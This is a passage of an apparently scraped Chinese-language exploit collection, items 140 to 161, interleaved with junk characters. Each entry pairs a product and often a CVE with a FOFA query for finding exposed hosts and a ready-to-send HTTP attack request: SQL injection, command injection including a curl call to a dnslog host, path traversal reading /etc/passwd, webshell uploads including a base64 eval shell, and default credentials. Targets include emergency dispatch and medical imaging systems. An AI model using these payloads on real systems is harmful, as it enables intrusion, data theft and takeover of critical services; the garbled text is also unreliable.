- `+ r# @7 N' q+ EHost: x.x.x.x
7 p9 B- S# _. }: f( ~* HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! T0 R; Q9 `/ [9 V9 {9 d+ ]" uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 Z# |/ c' \" I- m5 B2 i1 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 z. e# D/ [% [+ w$ ]$ R5 ] G, r
Accept-Encoding: gzip, deflate, br+ P& d( x5 ]* L$ i5 P! @* y
Connection: close
- @7 Y+ \: [7 F- ]Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk9 f% \+ ~3 m9 O+ h
Upgrade-Insecure-Requests: 1
* P( Z2 X! W% p* V& a$ j0 x/ f0 R% r/ L+ \
; w& j# E* u H _
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 |+ ` ^( @# u% M: v6 pCVE-2024-2566 n" a7 m+ R8 B
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& u- O4 c2 f- lGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.19 G9 d, Q2 y- |* C8 H
Host: x.x.x.x# d3 E- O% c! h- O2 f; O/ L- ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: m$ X/ [- v2 H$ {$ H- yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Y' i5 c, g2 r# [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 C( x% C& X$ S" M& o
Accept-Encoding: gzip, deflate, br9 W, H# B! K s: p+ x
Connection: close) c l+ J3 C; g+ m) k
Cookie: authcode=h8g9
8 _; y8 l7 V5 o) t4 E; V. r6 C! qUpgrade-Insecure-Requests: 1
# }+ W( b% c( E4 @: C7 g/ _$ W% `6 f" q9 B4 K/ I
4 ^6 j( o! n. \/ Z; J" H8 u141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入% ]; ` Q9 W( R' }0 \$ Q8 ^
FOFA:body="指挥调度管理平台"# q7 h$ n' B; b, M( ]3 ?
POST /app/ext/ajax_users.php HTTP/1.1
) ^. ?* [. @7 v" f5 k/ aHost: your-ip
4 ?# _8 t* ?2 L7 e+ DUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info- K" _0 f9 \, e- O; c* V+ n6 a$ e
Content-Type: application/x-www-form-urlencoded' x4 Q! @2 ^0 D, G) v5 F( y# t: \
/ Y- f" q6 e% N/ \2 c! W" u* X* [) V
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
" l7 u) x1 g/ {! M) c7 C) r* `4 y! Y/ X6 G3 @$ g
/ J) k/ c7 t, V+ R9 E142. CMSV6车辆监控平台系统中存在弱密码
# c5 t: O9 l% j1 h( L6 j" @9 QCVE-2024-29666
; b) [/ b: ~( Z. G( rFOFA:body="/808gps/"
( {8 H$ \" [3 z {$ P* ^admin/admin. @, O0 Y' q& S; K7 ^$ |0 M; I
143. Netis WF2780 v2.1.40144 远程命令执行- e0 V R( W/ G ]( @- H* ]) L/ x2 ~
CVE-2024-25850, ?" B+ a9 H( x
FOFA:title='AP setup' && header='netis': d5 Q& n- V: F
PAYLOAD, `6 o4 c; @1 Y- p6 J" W6 w
% _6 R1 L. {) B* M144. D-Link nas_sharing.cgi 命令注入- G# E" V9 A. v$ o' y! x' g& X. F
FOFA:app="D_Link-DNS-ShareCenter"
8 V& d" e) C( O- r1 _3 Isystem参数用于传要执行的命令
6 W4 S9 L, i+ j5 ~. CGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.15 N9 X" ?% w/ W) k! C4 w0 O
Host: x.x.x.x6 h: T% j. U# f4 D+ m% ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
@" `; ?" _. ]% {9 l. NConnection: close
. i$ H V h- B/ L9 C! T$ g# j) zAccept: */*. r% A m5 J% I0 [1 ]9 x, h c$ y
Accept-Language: en' s; k$ ?- I$ {' j
Accept-Encoding: gzip
u6 G# k0 u+ i: k: l
0 d" Z$ x3 s; X& e- H: T
6 @/ ^$ ~$ M3 j4 \3 P3 c: t145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
j; A8 g9 M0 x$ Q. M# rCVE-2024-3400
/ R( q0 _2 a$ h) M% Z |3 MFOFA:icon_hash="-631559155"
2 D& O" A+ B( B9 V% n" d) l2 aGET /global-protect/login.esp HTTP/1.1; c9 V i) r- I
Host: 192.168.30.112:1005
) \/ |- L3 i" z4 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84, w5 j, C, [1 m# d7 ~' r) X" d
Connection: close9 X# q' }! c' ? c5 S! Z1 G. d
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;1 e3 G; d) Y, Q6 E7 W1 N5 @
Accept-Encoding: gzip$ N: {6 C1 {' I5 A v
4 D& e8 P7 M4 [ X2 j! [) F% f/ P# Q+ ?4 p; V
146. MajorDoMo thumb.php 未授权远程代码执行
* D- `+ _. ]& o' u& T5 |; gCNVD-2024-021750 Q# i s2 x! b; h$ B9 x
FOFA:app="MajordomoSL", m8 D" R- z" w4 c7 O. X h, ?4 E1 R
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.11 N/ t# M2 f8 p9 {7 }
Host: x.x.x.x
; a& F- }9 @9 } W0 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' Q/ Q' n/ o1 n. NAccept-Charset: utf-8
Q5 G" k8 V0 E3 B$ v9 DAccept-Encoding: gzip, deflate6 q, B1 K) ~; ?+ V Z9 H
Connection: close5 Z9 Y% B( b( |0 _; T5 O/ k- ]& A6 w
, i5 _$ t: A" q W# o+ C2 C% P
9 e% y( v+ P, x- N' e. A b) }147. RaidenMAILD邮件服务器v.4.9.4-路径遍历! \/ b# y8 e* Q3 j+ `$ E2 }
CVE-2024-32399
" z+ |2 `; z5 g6 e: Y5 X# QFOFA:body="RaidenMAILD"! p4 B& R, r% q* S# C4 {
GET /webeditor/../../../windows/win.ini HTTP/1.13 x; a, h+ U: T6 m$ W; r) d( A
Host: 127.0.0.1:812 z: h( b( A- J# u5 n/ z" O0 n- Z
Cache-Control: max-age=07 c& n v( n( \0 }6 F I: N
Connection: close7 ]; n; h- n4 a# b2 V6 Z2 `
( w# p U! E2 V3 |" O
- p, b* k- y5 ^148. CrushFTP 认证绕过模板注入: H' \& a9 `" ~6 C% p" M6 ?8 }8 F
CVE-2024-40401 _- m. e* r: K) b, |
FOFA:body="CrushFTP"
& {3 y7 C/ }4 u' U4 bPAYLOAD, P6 m# h+ e J/ o
9 [% j7 e! a5 w! G$ {" G! q
149. AJ-Report开源数据大屏存在远程命令执行! P8 y1 m j e
FOFA:title="AJ-Report"+ l+ W R" j! Z9 P/ x- r
; A6 [& E. \% o
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1& ]6 b( \$ v# ^" I v5 N2 F# d6 V# K
Host: x.x.x.x
6 N5 R! }' f# M% \3 z+ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; Z& n8 d* q6 e' r; xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" f$ Z# {0 c# s) YAccept-Encoding: gzip, deflate, br2 }* O0 o4 g8 @$ ?7 i6 r3 V+ `& \
Accept-Language: zh-CN,zh;q=0.9- U9 O. x8 z& w- O8 w. y
Content-Type: application/json;charset=UTF-86 ~- F! H6 k9 R- u4 n
Connection: close/ L2 u8 {. p9 U# N
! @6 i3 O. L) |; O0 c4 N! x{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
5 H$ B# B7 g, y0 F! E: g6 V& q# f/ m, d! b3 ]0 T
150. AJ-Report 1.4.0 认证绕过与远程代码执行
/ }+ f3 ~5 @) g* `& C4 wFOFA:title="AJ-Report"
* a. w) Y4 o# L. [+ r" h, LPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1) _3 N: F$ b/ ?, N" Q
Host: x.x.x.x
" x/ }* N9 S! d2 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 @3 W, s- _% L* m1 S; m; h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ l; M% L" y2 Q
Accept-Encoding: gzip, deflate, br$ p+ h: d6 Y0 n# H- J0 o |
Accept-Language: zh-CN,zh;q=0.9
3 R* z3 x8 N( N8 t3 k% x6 GContent-Type: application/json;charset=UTF-8
: D" V' q' C1 M. O" DConnection: close
8 G6 f: K8 k( d0 E8 aContent-Length: 339/ m# t! x7 S: V+ a6 u1 D# d
" ^2 L' G% U$ T/ ~4 I0 b{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: }; R( m7 d2 [+ N* a
& S" ^5 e7 w. ?' W1 P B2 K3 O9 a$ T/ I" [( s6 J# J6 L0 I+ X! ]! f
151. AJ-Report 1.4.1 pageList sql注入4 X* s8 x; |; g+ I
FOFA:title="AJ-Report"
5 @+ d, J D& y1 ]- CGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
3 b: G; _ W# x9 r6 S! L1 L6 G% xHost: x.x.x.x
/ v& v& k7 ?* ~: y0 I# r4 y5 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& }3 [- p$ j. Y4 T, J: vConnection: close
: X$ f5 X0 j. ~/ N$ \' F8 g E' lAccept-Encoding: gzip; t. \0 O6 }, O" G. x/ X; }
. b2 N6 k+ o+ D& N) {6 k& T
6 Y2 R/ [* I) ? u: [2 C9 ~152. Progress Kemp LoadMaster 远程命令执行3 n5 b; w: d2 `- x" I1 W% r
CVE-2024-1212
- r$ K6 }, w! `! Q" S" }LoadMaster <= 7.2.59.2 (GA)
( w7 ~3 M. V* N& B* PLoadMaster<=7.2.54.8 (LTSF)
6 b0 x1 x* v3 R1 g+ j7 g1 t, w6 {LoadMaster <= 7.2.48.10 (LTS)1 _! V4 Z" D' `1 b
FOFA:body="LoadMaster"
) X+ v, \( @- l7 {JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
; x. j) y) L4 f/ f4 p( fGET /access/set?param=enableapi&value=1 HTTP/1.1
) y( i7 n: U( y: }: X* `Host: x.x.x.x
+ w8 c3 b( Z8 }, L9 S8 D* \9 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1# X W; J4 t b! {. U
Connection: close
8 J* J, B4 \. _- Y/ v, KAccept: */*( k3 C) _% i! |. m6 |, K4 X! c
Accept-Language: en
- i) L. h+ Y1 A* e( Y% \9 ?. _Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
- K+ x8 W6 A6 ~Accept-Encoding: gzip
! r0 M: \ Q) z8 @
1 I7 d' M* y5 x
- u' y* Q5 b) N; C153. gradio任意文件读取
5 G; K; t2 E9 L8 W9 U$ @CVE-2024-1561FOFA:body="__gradio_mode__"3 h0 U; i/ B7 D& O7 i6 P
第一步,请求/config文件获取componets的id8 d. l0 F) I$ R2 r7 r
http://x.x.x.x/config
. p. f- {! U. @1 [% y& D$ V8 S
' S0 ]0 B' J) f: H8 E3 {6 E. K
5 `- E9 R2 p+ G+ K- W第二步,将/etc/passwd的内容写入到一个临时文件7 A/ i8 w0 I4 M# Q7 |
POST /component_server HTTP/1.1
1 W9 e3 L; P9 V0 `Host: x.x.x.x1 \4 ` M% Q$ F5 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
1 X6 q/ w5 \0 l+ B7 p8 Y% s3 D: TConnection: close
' ^8 E+ G. |7 K1 D2 k v; pContent-Length: 115+ \; W. W9 B* c+ F
Content-Type: application/json
' H9 H6 f7 S' @" VAccept-Encoding: gzip
% S) T( m1 h( l5 \. x! e6 r5 g1 E' C
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
$ P$ \9 m" M( i0 C2 t# f
. w5 p& t& N0 J$ q
6 E. P1 q* w9 e3 l$ j0 c* E& f; N: p第三步访问
, [" F4 r* P; u, U& [http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
3 a& X, J5 W N, A
1 ] ~! r1 r* T" @
0 ~4 q" ?0 I, O5 \: n0 }6 [154. 天维尔消防救援作战调度平台 SQL注入
2 P/ j+ ^1 [9 D+ D. N' a6 vCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
) ~& D) C$ C' G8 ^3 R$ zPOST /twms-service-mfs/mfsNotice/page HTTP/1.1$ z, i# w( b4 B8 j5 T1 @- c
Host: x.x.x.x, i! w# T' s* F2 `3 w* k
Content-Length: 106
' I+ s+ T* T8 X0 A5 f, FCache-Control: max-age=0; c' s/ [- N7 z
Upgrade-Insecure-Requests: 1( E0 D1 Q8 h$ m3 A3 F- I F
Origin: http://x.x.x.x t5 v& Z$ _0 d; i4 h e, ~9 F
Content-Type: application/json0 r' S d0 g: {) Y/ D; ?% _8 }, A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36% T- L! |" V( `4 R$ s. D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: B# u& {! N$ L+ }
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
; X! s6 P! I* a- u5 cAccept-Encoding: gzip, deflate
) M; J/ ?. R5 ~" A+ o( CAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
: B" B' A: P# R9 z" A: ^. \5 gConnection: close
9 ^7 h* H% n6 p& j& y# p
# i8 N2 Z3 r' P7 q( Q$ X; d; a{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}% F- P3 w8 B" O4 B3 S3 Y
. m3 @8 U3 A! t% D/ U
( p! \ q, @ a& x* u2 w4 f155. 六零导航页 file.php 任意文件上传
6 g* z; I; C8 H$ f$ q# p" ]; zCVE-2024-34982+ p* u7 _3 l- G: u) H$ U4 |
FOFA:title=="上网导航 - LyLme Spage"9 y) R$ a4 U+ Y/ R, T# P2 X- @
POST /include/file.php HTTP/1.1
0 F& K5 V& f( C# F4 j- A& W6 pHost: x.x.x.x- Y- @, G6 Q6 F4 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 h1 y& c$ F, g0 `2 g$ Q
Connection: close3 C5 @, k9 l6 E/ E# O" }2 H7 D
Content-Length: 232
! |9 v7 ?( U! J0 _% c! H9 Q. DAccept: application/json, text/javascript, */*; q=0.01
2 D Z+ u9 w- }: ?5 r7 |" C$ u2 \# oAccept-Encoding: gzip, deflate, br7 ?$ n6 _' B5 }; E! V+ k# g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: A1 P5 o& ~ n. B4 ^6 }, ~Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f, z. b% W6 |; S2 X3 m6 P. ?
X-Requested-With: XMLHttpRequest
% E/ M3 i0 |6 Z0 n, P- ?, C8 S. X! Y$ \$ @7 \& ?0 X% G4 g
-----------------------------qttl7vemrsold314zg0f
1 c. g0 F7 d nContent-Disposition: form-data; name="file"; filename="test.php"
- O5 }- x c0 m o0 \0 n0 A" h" MContent-Type: image/png
/ o( u8 \8 Y8 g
7 ^1 F: M& m4 z7 a* n<?php phpinfo();unlink(__FILE__);?>
. e" o, E, P u: L: U+ n4 t-----------------------------qttl7vemrsold314zg0f--
* ~3 L: j( r, R, D! D" m# l, |" b% l
9 l5 p9 o( F2 q1 [8 m+ _
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
" b4 y7 _+ c# r: m, U) n9 B2 v$ r' i7 ?
156. TBK DVR-4104/DVR-4216 操作系统命令注入
; v! t: _' t' f- YCVE-2024-3721
% `* x" ]- j( ~. ]FOFA:"Location: /login.rsp"
$ f+ S' e2 P2 l# w" X( T·TBK DVR-4104
+ _1 m4 P ^# S& n; ?6 o·TBK DVR-4216! N; L' T% }6 m! V5 M9 h
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"! ~1 S+ r5 u1 O4 R3 ` K8 {4 n
[$ g8 ~9 o; B4 J7 C: T
( M4 @; m& F$ t- ~$ E$ {
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
+ d' W. Z- T9 [Host: x.x.x.x( t" X' P: G1 I" l- P+ l
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ r! U& E e/ @* N
Connection: close
( ^% A! t% }; x2 XContent-Length: 0# K7 ^ Z2 I( i1 d
Cookie: uid=1 N/ ?$ c( Z, n, w V& H; ]
Accept-Encoding: gzip& h/ }8 M8 J$ ]& L' t& v2 j
. W' w# S1 q3 U$ p4 E
* [$ w- o" ]% @0 u P157. 美特CRM upload.jsp 任意文件上传
" [0 j, V7 }# K% E WCNVD-2023-06971
! \# V' a' W- H$ H9 f6 vFOFA:body="/common/scripts/basic.js"7 V0 [; @6 _( `2 Z9 ?
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
0 M; [7 f# \' y/ i% F" o" E9 kHost: x.x.x.x9 L- |3 q% n1 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36- y/ a: ~( r8 C2 j% m0 H, z
Content-Length: 7093 v9 Q( N# O) c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# O3 d( G6 i6 n( q' hAccept-Encoding: gzip, deflate
2 I: b; x. C, K7 xAccept-Language: zh-CN,zh;q=0.9. A0 I- _# G; U0 h" b% \* B
Cache-Control: max-age=04 v# ?2 ] [1 x |4 A0 {* V
Connection: close$ K& d! o: A. e0 d0 r) ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
. G8 N4 V0 ~% k. }4 C! pUpgrade-Insecure-Requests: 1
) {6 ^2 l- M5 K/ P7 Q4 F8 I$ D. {6 q
------WebKitFormBoundary1imovELzPsfzp5dN
+ U" L A+ q N/ \( {* cContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
3 a5 n, @- P3 P' a5 SContent-Type: application/octet-stream
; {* R0 F; W! w
- b3 V, m, f% |8 B+ Pnyhelxrutzwhrsvsrafb4 o' H4 B6 h) z w
------WebKitFormBoundary1imovELzPsfzp5dN& |2 z) h% `% c5 |* ?* C0 B
Content-Disposition: form-data; name="key"
2 g% f/ w8 m8 K6 r* Y& X2 y. Z4 O* s, X1 i# u' K: B4 R' C
null# W5 E& H% M, B) G+ Z" |
------WebKitFormBoundary1imovELzPsfzp5dN
+ z$ f- m' U! c8 YContent-Disposition: form-data; name="form"
; l& ~# H( X* s) W: U- `" ]2 q& r N3 E5 Q3 L8 p
null. w( T" i2 U! o" D) |6 r
------WebKitFormBoundary1imovELzPsfzp5dN' t, J* p3 @! ~- P, m# f- \' D( m
Content-Disposition: form-data; name="field"- M: h( k) B) p0 z* A5 W
8 z" n" `, I- F' s
null0 T0 ^4 E$ K, r. b: U9 t
------WebKitFormBoundary1imovELzPsfzp5dN
1 _ J! ]: S+ j+ \7 m* {& lContent-Disposition: form-data; name="filetitile". q5 `. f6 S& k7 B. E t
% {# a$ _( Y6 W* Q% \8 n/ }# b
null$ b$ u) ?& ^# p. O, s6 E9 }3 Y
------WebKitFormBoundary1imovELzPsfzp5dN5 P: S5 [5 T; R8 r% v
Content-Disposition: form-data; name="filefolder"5 `! g4 @9 {# Q: m& _; j8 H& m
& `. @; e6 l2 b# A6 h: w6 Tnull5 y! x1 [7 J8 i0 l0 R* W
------WebKitFormBoundary1imovELzPsfzp5dN--/ o! {5 q( W/ J9 x& F" n9 m
m* F1 p5 E1 B! ~: s+ {
4 G( G4 |( m8 K- m0 }http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
7 l. B1 |& H9 R) @( A7 C7 p$ R2 G) `# D% ^, l. n' S
158. Mura-CMS-processAsyncObject存在SQL注入- A1 t% ~5 H+ f; n% z! a& y- K
CVE-2024-32640
, Q# M. B5 f, ]/ W e1 jFOFA:"Generator: Masa CMS"
; e5 I% _. f. c( t6 p/ @POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 U+ j/ `% u6 K8 i5 uHost: {{Hostname}}+ }0 M$ q. ~+ }; W
Content-Type: application/x-www-form-urlencoded$ h8 q. F0 \+ u& j a. K/ G% ` K
" l& x4 m. l! J$ Z
object=displayregion&contenthistid=x\'&previewid=1
$ p1 d) g" q8 l# `$ B) F, r/ F1 R- ?* @
+ I: Q1 L+ i5 v+ w
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
. H, y I0 ^; g6 LFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")9 M& c9 A; K2 Z
POST /webservices/WebJobUpload.asmx HTTP/1.1! U6 t- J# i, Y, J7 [/ r
Host: x.x.x.x
" L+ ^0 H* |+ V/ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
S* f; `9 J/ \: d' f( z4 B0 R. u! iContent-Length: 10809 E0 w9 ]2 M" |. c
Accept-Encoding: gzip, deflate- H* D) d2 b# F9 ] g) ?
Connection: close6 J- E3 ]' {' F# ?/ J. y
Content-Type: text/xml; charset=utf-8, l0 f# m1 t7 ` v) I9 i- M2 l
Soapaction: "http://rainier/jobUpload"
. L8 Z% \& @3 c2 h6 s" V8 G- Q: ?" N7 p
<?xml version="1.0" encoding="utf-8"?>
) z! g/ D+ ^' x& u% @- a5 g<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 Y3 O7 y9 b4 W9 a<soap:Body>
* n0 |+ K& y, L! p9 P/ n* N4 @<jobUpload xmlns="http://rainier">' f1 Z) G; |2 n3 {( \+ t
<vcode>1</vcode>
: z7 X% K- e( Q<subFolder></subFolder>4 M! ?# |+ s# l( C
<fileName>abcrce.asmx</fileName># X0 ?" m7 w! [- G/ f+ _ U, }
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>( l8 ~$ [( u: e5 {' L
</jobUpload># j- f8 \' H- m" O$ ]( _
</soap:Body>
% l5 x; ]! }9 w$ Y+ w</soap:Envelope>: u/ U4 F, m4 @$ _" s) g
- w) } g) n; \/ H0 u% E# {' s
1 k/ I, q* |8 o( h; M/ u/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")& t0 Q& X# D% j
; M' o+ V$ T' Z$ f+ h$ X
8 E; K: q; B8 r8 _; }. c
160. Sonatype Nexus Repository 3目录遍历与文件读取2 {5 c$ F9 Q8 P/ b; l5 {$ E/ o
CVE-2024-49562 c x. w$ N8 v6 A* I
FOFA:title="Nexus Repository Manager"9 x6 l7 ^$ G: u( H5 \( c2 B& u$ h/ s
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.13 E* C: v. _& X+ M* X) C
Host: x.x.x.x
5 Q& m3 V$ s; G% d& z5 JUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.06 f( `' `1 X, T n9 s
Connection: close) q/ ^; D; j2 ]; ~( N/ {3 G
Accept: */*
7 m G% W) N! T hAccept-Language: en& a0 m( h2 Z' R( D
Accept-Encoding: gzip
6 @" E) `4 y e& q6 e; i3 E9 ]3 @ N( t ]- j0 D
K3 T6 x; d, Z# r3 W* G" O
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
+ }/ A7 y0 F* P6 ZFOFA:body="/KT_Css/qd_defaul.css"
! w( p7 a. S, u! } T1 A9 Y第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密& @3 \: H, q. l
POST /Webservice.asmx HTTP/1.1
; O" X. ?* g- pHost: x.x.x.x
6 ~; [, e3 n# c9 ^9 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.366 h$ U/ x7 u0 h& D! [' d
Connection: close
( N& o9 B3 s% ?4 k5 tContent-Length: 445# ^6 |3 @8 y7 M- t7 n
Content-Type: text/xml
1 g& q& q8 X% j2 Q. a- F1 ^Accept-Encoding: gzip
9 I% h: l) i& ]1 C% w) e: G% u! D% C
<?xml version="1.0" encoding="utf-8"?>2 V* @ [3 A: O9 }8 c6 o
<soap:Envelope xmlns:xsi="
0 _7 j1 [) M* P4 b* Y, q9 f7 Rhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"( G" T" o6 Q$ J- @' N4 x
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">7 ~6 [8 {! S- |, |
<soap:Body>/ l! H* ~+ @2 w7 g% J
<UploadResume xmlns="http://tempuri.org/">
# }" E! t" ~! }<ip>1</ip>
8 s; _* S, P' t<fileName>../../../../dizxdell.aspx</fileName>
